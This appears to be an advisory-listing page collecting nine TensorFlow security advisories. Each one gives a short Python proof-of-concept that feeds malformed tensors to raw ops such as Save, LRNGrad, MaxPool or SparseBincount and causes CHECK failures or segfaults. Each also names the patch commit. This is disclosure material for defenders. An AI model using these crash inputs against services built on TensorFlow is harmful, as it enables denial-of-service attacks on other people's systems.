# dos

GHSA-m6vp-8q9j-whx4: TensorFlow vulnerable to `CHECK` fail in `Save` and `SaveSlices`

#mac #apple #dos #git

### Impact If `Save` or `SaveSlices` is run over tensors of an unsupported `dtype`, it results in a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf filename = tf.constant("") tensor_names = tf.constant("") # Save data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=-2021), tf.uint64) tf.raw_ops.Save(filename=filename, tensor_names=tensor_names, data=data, ) # SaveSlices shapes_and_slices = tf.constant("") data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=9712), tf.uint32) tf.raw_ops.SaveSlices(filename=filename, tensor_names=tensor_names, shapes_and_slices=shapes_and_slices, data=data, ) ``` ### Patches We have patched the issue in GitHub commit [5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4](https://github.com/tensorflow/tensorflow/commit/5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4). The fix will be included in TensorFlow 2.10.0. We will also cherrypick...

2 years ago

GHSA-p2xf-8hgm-hpw5: TensorFlow vulnerable to `CHECK` fail in `ParameterizedTruncatedNormal`

### Impact `ParameterizedTruncatedNormal` assumes `shape` is of type `int32`. A valid `shape` of type `int64` results in a mismatched type `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf seed = 1618 seed2 = 0 shape = tf.random.uniform(shape=[3], minval=-10000, maxval=10000, dtype=tf.int64, seed=4894) means = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971) stdevs = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971) minvals = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971) maxvals = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971) tf.raw_ops.ParameterizedTruncatedNormal(shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals, seed=seed, seed2=seed2) ``` ### Patches We have patched the issue in GitHub commit [72180be03447a10810edca700cbc9a...

2 years ago

GHSA-9942-r22v-78cp: TensorFlow vulnerable to `CHECK` fail in `LRNGrad`

### Impact If `LRNGrad` is given an `output_image` input tensor that is not 4-D, it results in a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf depth_radius = 1 bias = 1.59018219 alpha = 0.117728651 beta = 0.404427052 input_grads = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033) input_image = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033) output_image = tf.random.uniform(shape=[4, 4, 4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033) tf.raw_ops.LRNGrad(input_grads=input_grads, input_image=input_image, output_image=output_image, depth_radius=depth_radius, bias=bias, alpha=alpha, beta=beta) ``` ### Patches We have patched the issue in GitHub commit [bd90b3efab4ec958b228cd7cfe9125be1c0cf255](https://github.com/tensorflow/tensorflow/commit/bd90b3efab4ec958b228cd7cfe9125be1c0cf255). The fix will be included in Tenso...

2 years ago

GHSA-wr9v-g9vf-c74v: TensorFlow vulnerable to segfault in `RaggedBincount`

### Impact If `RaggedBincount` is given an empty input tensor `splits`, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf binary_output = True splits = tf.random.uniform(shape=[0], minval=-10000, maxval=10000, dtype=tf.int64, seed=-7430) values = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000) size = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000) weights = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.float32, seed=-10000) tf.raw_ops.RaggedBincount(splits=splits, values=values, size=size, weights=weights, binary_output=binary_output) ``` ### Patches We have patched the issue in GitHub commit [7a4591fd4f065f4fa903593bc39b2f79530a74b8](https://github.com/tensorflow/tensorflow/commit/7a4591fd4f065f4fa903593bc39b2f79530a74b8). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1,...

2 years ago

GHSA-9vqj-64pv-w55c: TensorFlow vulnerable to `CHECK` fail in `tf.linalg.matrix_rank`

### Impact When `tf.linalg.matrix_rank` receives an empty input `a`, the GPU kernel gives a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf a = tf.constant([], shape=[0, 1, 1], dtype=tf.float32) tf.linalg.matrix_rank(a=a) ``` ### Patches We have patched the issue in GitHub commit [c55b476aa0e0bd4ee99d0f3ad18d9d706cd1260a](https://github.com/tensorflow/tensorflow/commit/c55b476aa0e0bd4ee99d0f3ad18d9d706cd1260a). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Kang Hong Jin.

2 years ago

GHSA-j43h-pgmg-5hjq: TensorFlow vulnerable to `CHECK` fail in `MaxPool`

### Impact When `MaxPool` receives a window size input array `ksize` with dimensions greater than its input tensor `input`, the GPU kernel gives a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf import numpy as np input = np.ones([1, 1, 1, 1]) ksize = [1, 1, 2, 2] strides = [1, 1, 1, 1] padding = 'VALID' data_format = 'NCHW' tf.raw_ops.MaxPool(input=input, ksize=ksize, strides=strides, padding=padding, data_format=data_format) ``` ### Patches We have patched the issue in GitHub commit [32d7bd3defd134f21a4e344c8dfd40099aaf6b18](https://github.com/tensorflow/tensorflow/commit/32d7bd3defd134f21a4e344c8dfd40099aaf6b18). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/...

2 years ago

GHSA-397c-5g2j-qxpv: TensorFlow vulnerable to segfault in `SparseBincount`

### Impact If `SparseBincount` is given inputs for `indices`, `values`, and `dense_shape` that do not make a valid sparse tensor, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf binary_output = True indices = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int64, seed=-1288) values = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-9366) dense_shape = tf.random.uniform(shape=[0], minval=-10000, maxval=10000, dtype=tf.int64, seed=-9878) size = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000) weights = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.float32, seed=-10000) tf.raw_ops.SparseBincount(indices=indices, values=values, dense_shape=dense_shape, size=size, weights=weights, binary_output=binary_output) ``` ### Patches We have patched the issue in GitHub commit [40adbe4dd15b582b0210dfbf40c243a62f5119fa](https://git...

2 years ago

GHSA-vxv8-r8q2-63xw: TensorFlow vulnerable to `CHECK` fail in `FractionalMaxPoolGrad`

### Impact `FractionalMaxPoolGrad` validates its inputs with `CHECK` failures instead of with returning errors. If it gets incorrectly sized inputs, the `CHECK` failure can be used to trigger a denial of service attack: ```python import tensorflow as tf overlapping = True orig_input = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32) orig_output = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32) out_backprop = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32) row_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64) col_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad(orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=overlapping) ``` ### Patches We have patched the issue in GitHub commit [8741e57d163a079db05a7107a7609af70931def4](https://github.com/tensorflow/tensorflow/commit/8741...

2 years ago

GHSA-v7vw-577f-vp8x: TensorFlow vulnerable to segfault in `QuantizedRelu` and `QuantizedRelu6`

### Impact If `QuantizedRelu` or `QuantizedRelu6` are given nonscalar inputs for `min_features` or `max_features`, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf out_type = tf.quint8 features = tf.constant(28, shape=[4,2], dtype=tf.quint8) min_features = tf.constant([], shape=[0], dtype=tf.float32) max_features = tf.constant(-128, shape=[1], dtype=tf.float32) tf.raw_ops.QuantizedRelu(features=features, min_features=min_features, max_features=max_features, out_type=out_type) tf.raw_ops.QuantizedRelu6(features=features, min_features=min_features, max_features=max_features, out_type=out_type) ``` ### Patches We have patched the issue in GitHub commit [49b3824d83af706df0ad07e4e677d88659756d89](https://github.com/tensorflow/tensorflow/commit/49b3824d83af706df0ad07e4e677d88659756d89). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2....

2 years ago